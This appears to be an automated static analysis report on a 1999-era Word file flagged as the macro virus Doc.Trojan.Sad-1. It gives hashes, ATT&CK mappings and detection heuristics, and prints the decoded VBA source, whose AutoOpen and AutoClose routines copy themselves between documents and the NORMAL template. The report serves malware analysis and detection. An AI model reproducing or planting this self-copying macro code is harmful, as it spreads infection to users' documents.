Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8d3b78f81a3b073…

MALICIOUS

Office (OLE)

Size: 174.5 KB
Created: 1999-04-06 10:13:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a1433191a0c231bcf922573a2ae76753
SHA-1: 1810ec0f7f3d5e28b3abc6002f58a516d4bee9d1
SHA-256: c8d3b78f81a3b073092dfc3a1ad2ff61ff65b216904e4aa7b75227d3bcb0994a
Risk Score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, specifically AutoOpen and Auto_Close, which run automatically when the document is opened or closed. The macros copy themselves between the document and the global (NORMAL) template, the classic macro-virus pattern for establishing persistence and spreading to other documents. The ClamAV detection as 'Doc.Trojan.Sad-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Sad-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sad-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1142 bytes
SHA-256: cef77b0dbc37fc8deb5bfe730897ece7dbd4cad87111e94f41318c6788942cfa
Detection
ClamAV: Doc.Trojan.Sad-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sad"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Installed to your NORMAL template as AutoClose to clean the prank macros from any documents that you open then close."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.VClose.MAIN"
Dim Micro$
Dim Logic$
    On Error GoTo -1: On Error GoTo Abort

        WordBasic.FileSaveAs Format:=1

        Micro$ = WordBasic.[FileName$]()

        Logic$ = Micro$ + ":AutoOpen"
        WordBasic.MacroCopy "Global:Module1", Logic$

        Logic$ = Micro$ + ":Sad"
        WordBasic.MacroCopy "Global:AutoClose", Logic$

        WordBasic.FileSaveAs Format:=1

Abort:
End Sub
Public Sub Logic()
Rem I am not a Genius ;-)
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim Micro$
Dim Logic$
    On Error GoTo -1: On Error GoTo Abort
    
            Micro$ = WordBasic.[FileName$]()

           
            Logic$ = Micro$ + ":AutoOpen"
            WordBasic.MacroCopy Logic$, "Global:Module1"

            Logic$ = Micro$ + ":Sad"
            WordBasic.MacroCopy Logic$, "Global:AutoClose"

Abort:
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_983436825/Ole10Native 896 bytes
SHA-256: 3e01369858f0fa605a5c2bdb3a6a1c585400cea4d0297f131bc6b75a5953214f
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_984919303/Ole10Native 896 bytes
SHA-256: 294d085777573769b08fcb38609be42d78bf08da64dc9940c11e04c22e99d963